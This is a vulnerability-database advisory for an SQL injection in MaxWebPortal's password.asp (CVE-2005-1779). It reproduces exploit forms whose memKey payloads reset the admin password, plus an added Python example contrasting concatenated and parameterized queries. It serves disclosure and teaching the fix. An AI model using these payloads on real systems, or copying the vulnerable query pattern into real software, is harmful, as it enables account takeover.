MaxWebPortal SQL Injection Vulnerability


Vulnerability ID: 1108813
Vulnerability type: SQL injection
Published: 2005-05-26
Updated: 2005-10-20
CVE ID: CVE-2005-1779
CNNVD-ID: CNNVD-200505-1249
Platform: ASP
CVSS score: 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/1012
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-1249
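|Vulnerability details
password.asp in MaxWebPortal 1.35, 1.36, 2.0 and 20050418 Next contains a SQL injection vulnerability. A remote attacker can execute arbitrary SQL commands via the memKey parameter.
|Exploit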
<!--
Hi, I'm Soroush Dalili from Grayhatz Security Group (GSG). I found a dangerous SQL injection
in MaxWebPortal version 1.35, 1.36, 2.0, 20050418 Next.
A remote user can inject his/her code in the "memKey" var. and change other users' passwords in
password.asp.

Exploit code as proof:
-->

-----------------Code Start-----Version 1.35 and older--------------
<form action="http://[URL]/password.asp?mode=reset" method="post">
<br>
pass1: <input name="pass" type="text" value="123456" size="150"><br>
pass2: <input name="pass2" type="text" value="123456" size="150"><br>
Id: <input name="memId" type="text" value="-1" size="150"><br>
Member Key: <input name="memKey" type="text" value="foo' or M_Name='admin" size="150">
<br>
<input name="Submit" type="submit" value="Submit">
</form>
-----------------End-------------------

Version 1.36, 2.0, 20050418 Next:

-----------------Code Start-----Version 1.36, 2.0, 20050418 Next--------------
<form action="http://[URL]/password.asp?mode=reset" method="post">
<br>
pass1: <input name="pass" type="text" value="123456" size="150"><br>
pass2: <input name="pass2" type="text" value="123456" size="150"><br>
Id: <input name="memId" type="text" value="-1" size="150"><br>
Member Key: <input name="memKey" type="text" value="foo') or M_Name='admin' or ('1'='2" size="150">
<br>
<input name="Submit" type="submit" value="Submit">
</form>
-----------------End-------------------

# milw0rm.com [2005-05-26]
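
The flaw class and its fix, as an added example that is not part of the original advisory and is not MaxWebPortal's code: a Python/sqlite3 model of a key-checked password reset, with the query built by string concatenation beside a parameterized version, both given the memKey value from the version 1.35 form above. The table layout, every column name other than M_Name, and all function names are assumptions made for the example.

```python
import sqlite3

# memKey value taken from the version 1.35 form in the advisory.
ADVISORY_MEMKEY = "foo' or M_Name='admin"

def make_db():
    """Constructed sample data; the schema is an assumption, not the product's."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE members (MEMBER_ID INTEGER, M_Name TEXT,"
               " M_Key TEXT, M_Password TEXT)")
    db.executemany("INSERT INTO members VALUES (?, ?, ?, ?)",
                   [(1, "admin", "k-admin", "orig-admin"),
                    (2, "alice", "k-alice", "orig-alice")])
    return db

def reset_concatenated(db, mem_id, mem_key, new_pass):
    """Vulnerable pattern: request values are pasted into the SQL text, so a
    quote in mem_key ends the string literal and the rest is parsed as SQL."""
    sql = ("UPDATE members SET M_Password = '" + new_pass + "' "
           "WHERE MEMBER_ID = " + mem_id + " AND M_Key = '" + mem_key + "'")
    return db.execute(sql).rowcount

def reset_parameterized(db, mem_id, mem_key, new_pass):
    """Hardened pattern: the id must be an integer and every value is bound
    as a parameter, so mem_key is only ever compared as data."""
    try:
        member_id = int(mem_id)
    except ValueError:
        return 0
    cur = db.execute(
        "UPDATE members SET M_Password = ? WHERE MEMBER_ID = ? AND M_Key = ?",
        (new_pass, member_id, mem_key))
    return cur.rowcount

def admin_password(db):
    row = db.execute("SELECT M_Password FROM members WHERE M_Name = 'admin'")
    return row.fetchone()[0]

if __name__ == "__main__":
    for fn in (reset_concatenated, reset_parameterized):
        db = make_db()
        changed = fn(db, "-1", ADVISORY_MEMKEY, "123456")
        print(fn.__name__, "rows changed:", changed,
              "admin password:", admin_password(db))
```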
|References

Source: SECTRACK
Name: 1014048
Link: http://securitytracker.com/id?1014048
Source: SECUNIA
Name: 15511
Link: http://secunia.com/advisories/15511
